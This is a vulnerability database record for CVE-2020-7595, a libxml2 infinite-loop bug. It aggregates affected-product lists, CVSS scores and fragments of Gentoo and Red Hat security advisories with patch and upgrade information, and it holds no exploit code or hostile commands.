"date": "2022-08-19T15:03:34",
"db": "PACKETSTORM",
"id": "168112",
"ident": null
},
{
"date": "2023-01-26T15:29:09",
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"date": "2022-12-12T23:02:21",
"db": "PACKETSTORM",
"id": "170196",
"ident": null
},
{
"date": "2022-12-08T21:28:21",
"db": "PACKETSTORM",
"id": "170165",
"ident": null
},
{
"date": "2023-10-31T13:11:25",
"db": "PACKETSTORM",
"id": "175432",
"ident": null
},
{
"date": "2022-12-09T14:52:40",
"db": "PACKETSTORM",
"id": "170179",
"ident": null
},
{
"date": "2024-11-04T16:28:12",
"db": "PACKETSTORM",
"id": "182466",
"ident": null
},
{
"date": "2022-06-21T15:15:09.060000",
"db": "NVD",
"id": "CVE-2022-2068",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2022-2068",
"ident": null
},
{
"date": "2025-11-03T22:15:58.023000",
"db": "NVD",
"id": "CVE-2022-2068",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "175432"
}
],
"trust": 0.1
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-6024-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "168022"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "175432"
}
],
"trust": 0.2
}
}
VAR-202001-1866
Vulnerability from variot - Updated: 2026-03-09 20:18xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. It exists that libxml2 incorrectly handled certain XML files. (CVE-2019-19956, CVE-2020-7595). Bugs fixed (https://bugzilla.redhat.com/):
1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module 1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values 1916813 - CVE-2021-20191 ansible: multiple modules expose secured values 1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option 1939349 - CVE-2021-3447 ansible: multiple modules expose secured values
-
Gentoo Linux Security Advisory GLSA 202010-04
https://security.gentoo.org/
Severity: Normal Title: libxml2: Multiple vulnerabilities Date: October 20, 2020 Bugs: #710748 ID: 202010-04
Synopsis
Multiple vulnerabilities have been found in libxml2, the worst of which could result in a Denial of Service condition.
Background
libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.9.10 >= 2.9.10
Description
Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.10"
References
[ 1 ] CVE-2019-20388 https://nvd.nist.gov/vuln/detail/CVE-2019-20388 [ 2 ] CVE-2020-7595 https://nvd.nist.gov/vuln/detail/CVE-2020-7595
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202010-04
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. The compliance-operator image updates are now available for OpenShift Container Platform 4.6.
Bug Fix(es):
-
Aggregator pod tries to parse ConfigMaps without results (BZ#1899479)
-
The compliancesuite object returns error with ocp4-cis tailored profile (BZ#1902251)
-
The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object (BZ#1902634)
-
[OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object (BZ#1907414)
-
The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator (BZ#1908991)
-
Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" (BZ#1909081)
-
[OCP v46] Always update the default profilebundles on Compliance operator startup (BZ#1909122)
-
Solution:
For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/):
1899479 - Aggregator pod tries to parse ConfigMaps without results 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902251 - The compliancesuite object returns error with ocp4-cis tailored profile 1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object 1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object 1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator 1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" 1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup
- Description:
Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and developer experience tools.
This advisory is intended to use with container images for Red Hat 3scale API Management 2.10.0. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
- Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html
- Description:
Red Hat OpenShift Do (odo) is a simple CLI tool for developers to create, build, and deploy applications on OpenShift. The odo tool is completely client-based and requires no server within the OpenShift cluster for deployment. It detects changes to local code and deploys it to the cluster automatically, giving instant feedback to validate changes in real-time. It supports multiple programming languages and frameworks.
The advisory addresses the following issues:
-
Re-release of odo-init-image 1.1.3 for security updates
-
Solution:
Download and install a new CLI binary by following the instructions linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
1832983 - Release of 1.1.3 odo-init-image
-
8) - aarch64, ppc64le, s390x, x86_64
-
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security and bug fix update Advisory ID: RHSA-2020:3996-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:3996 Issue date: 2020-09-29 CVE Names: CVE-2019-19956 CVE-2019-20388 CVE-2020-7595 ==================================================================== 1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
-
libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c (CVE-2019-19956)
-
libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c (CVE-2019-20388)
-
libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file situations (CVE-2020-7595)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.9 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
ppc64: libxml2-2.9.1-6.el7.5.ppc.rpm libxml2-2.9.1-6.el7.5.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm libxml2-devel-2.9.1-6.el7.5.ppc.rpm libxml2-devel-2.9.1-6.el7.5.ppc64.rpm libxml2-python-2.9.1-6.el7.5.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7.5.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm libxml2-devel-2.9.1-6.el7.5.ppc64le.rpm libxml2-python-2.9.1-6.el7.5.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7.5.s390.rpm libxml2-2.9.1-6.el7.5.s390x.rpm libxml2-debuginfo-2.9.1-6.el7.5.s390.rpm libxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm libxml2-devel-2.9.1-6.el7.5.s390.rpm libxml2-devel-2.9.1-6.el7.5.s390x.rpm libxml2-python-2.9.1-6.el7.5.s390x.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: libxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm libxml2-static-2.9.1-6.el7.5.ppc.rpm libxml2-static-2.9.1-6.el7.5.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm libxml2-static-2.9.1-6.el7.5.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7.5.s390.rpm libxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm libxml2-static-2.9.1-6.el7.5.s390.rpm libxml2-static-2.9.1-6.el7.5.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX3OgG9zjgjWX9erEAQg9vhAAiDkPkj6VlpMKDvgVUY4eU83p4bCnZqos e9kVjDMJrHdYR5iXXc665LOYBG0yyDGdvVLeqxjI9S11UDypRyzy641kwBY6eCru 0yaA88aZ4YpQyIARmmK7cIMFe6JRWHOkEsOfMCtjpbkGLteXdzfUFgJnlRFB0Dai OVrZH3kGb5EbKvJGcWY7cqv5jQhpy802a4EhpHQ1q6vFAbO7D1T6vJlCyP0+ba5N ZoMyrCFWaX5TUjiwFkuyAiSZYyPyxo0+dhqgJaSU44BH4p5imV7c1oh10U7/7k+O Y30M2uLOuArD1ad0t2d23EVr8mRKUr+agoLWC8Pwuq2worTArE/395GKXv2Yvtv9 YCvvCNFIcnG5GaJloqhXkTZM2pCr0+n90WLrNZ0suPArycHU74ROfBNErWegvq2e gpFLyu3S1mpjcBG19Gjg1qgh7FKg57s7PbNzcETK5ParBQeZ4dHHpcr9voP52tYD SJ9ILV9unM5jya5Uwooa6GOFGistLQLntZd22zDcPahu0FxvQlyZFV4oInF0m/7h e/h8NgSwyJKNenZATlsOGmjdcMh95Unztu4bfK8S20/Ej8F/B2PE4Kxha2s0bxsC b9fFKBOIdTCeFi2lTyrctEGQl9ksrW/Va6+uQwe5lKQldwhB3of9QolUu7ud+gdx COt/fBH012Y=udpL -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Solution:
See the documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/ 4.6/html/serverless_applications/index
- Bugs fixed (https://bugzilla.redhat.com/):
1874857 - CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1897643 - CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time 1897646 - CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time 1906381 - Release of OpenShift Serverless Serving 1.12.0 1906382 - Release of OpenShift Serverless Eventing 1.12.0
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "libxml2",
"scope": "eq",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.9.10"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0.0"
},
{
"_id": null,
"model": "real user experience insight",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.1.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.10"
},
{
"_id": null,
"model": "mysql workbench",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "sinema remote connect server",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "real user experience insight",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.5.1.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.5.0.0"
},
{
"_id": null,
"model": "symantec netbackup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "30"
},
{
"_id": null,
"model": "snapdrive",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "real user experience insight",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.10.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 1.5
},
"cve": "CVE-2020-7595",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-7595",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-185720",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-7595",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-7595",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-7595",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-965",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-185720",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-7595",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"description": {
"_id": null,
"data": "xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. It exists that libxml2 incorrectly handled certain XML files. \n(CVE-2019-19956, CVE-2020-7595). Bugs fixed (https://bugzilla.redhat.com/):\n\n1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module\n1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values\n1916813 - CVE-2021-20191 ansible: multiple modules expose secured values\n1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option\n1939349 - CVE-2021-3447 ansible: multiple modules expose secured values\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202010-04\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: libxml2: Multiple vulnerabilities\n Date: October 20, 2020\n Bugs: #710748\n ID: 202010-04\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in libxml2, the worst of which\ncould result in a Denial of Service condition. \n\nBackground\n==========\n\nlibxml2 is the XML (eXtended Markup Language) C parser and toolkit\ninitially developed for the Gnome project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/libxml2 \u003c 2.9.10 \u003e= 2.9.10\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libxml2. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.9.10\"\n\nReferences\n==========\n\n[ 1 ] CVE-2019-20388\n https://nvd.nist.gov/vuln/detail/CVE-2019-20388\n[ 2 ] CVE-2020-7595\n https://nvd.nist.gov/vuln/detail/CVE-2020-7595\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202010-04\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n\n. \nThe compliance-operator image updates are now available for OpenShift\nContainer Platform 4.6. \n\nBug Fix(es):\n\n* Aggregator pod tries to parse ConfigMaps without results (BZ#1899479)\n\n* The compliancesuite object returns error with ocp4-cis tailored profile\n(BZ#1902251)\n\n* The compliancesuite does not trigger when there are multiple rhcos4\nprofiles added in scansettingbinding object (BZ#1902634)\n\n* [OCP v46] Not all remediations get applied through machineConfig although\nthe status of all rules shows Applied in ComplianceRemediations object\n(BZ#1907414)\n\n* The profile parser pod deployment and associated profiles should get\nremoved after upgrade the compliance operator (BZ#1908991)\n\n* Applying the \"rhcos4-moderate\" compliance profile leads to Ignition error\n\"something else exists at that path\" (BZ#1909081)\n\n* [OCP v46] Always update the default profilebundles on Compliance operator\nstartup (BZ#1909122)\n\n3. Solution:\n\nFor OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster\n- -cli.html. Bugs fixed (https://bugzilla.redhat.com/):\n\n1899479 - Aggregator pod tries to parse ConfigMaps without results\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n1902251 - The compliancesuite object returns error with ocp4-cis tailored profile\n1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object\n1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object\n1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator\n1909081 - Applying the \"rhcos4-moderate\" compliance profile leads to Ignition error \"something else exists at that path\"\n1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup\n\n5. Description:\n\nRed Hat 3scale API Management delivers centralized API management features\nthrough a distributed, cloud-hosted layer. It includes built-in features to\nhelp in building a more successful API program, including access control,\nrate limits, payment gateway integration, and developer experience tools. \n\nThis advisory is intended to use with container images for Red Hat 3scale\nAPI Management 2.10.0. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n\n5. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Description:\n\nRed Hat OpenShift Do (odo) is a simple CLI tool for developers to create,\nbuild, and deploy applications on OpenShift. The odo tool is completely\nclient-based and requires no server within the OpenShift cluster for\ndeployment. It detects changes to local code and deploys it to the cluster\nautomatically, giving instant feedback to validate changes in real-time. It\nsupports multiple programming languages and frameworks. \n\nThe advisory addresses the following issues:\n\n* Re-release of odo-init-image 1.1.3 for security updates\n\n3. Solution:\n\nDownload and install a new CLI binary by following the instructions linked\nfrom the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1832983 - Release of 1.1.3 odo-init-image\n\n5. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security and bug fix update\nAdvisory ID: RHSA-2020:3996-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3996\nIssue date: 2020-09-29\nCVE Names: CVE-2019-19956 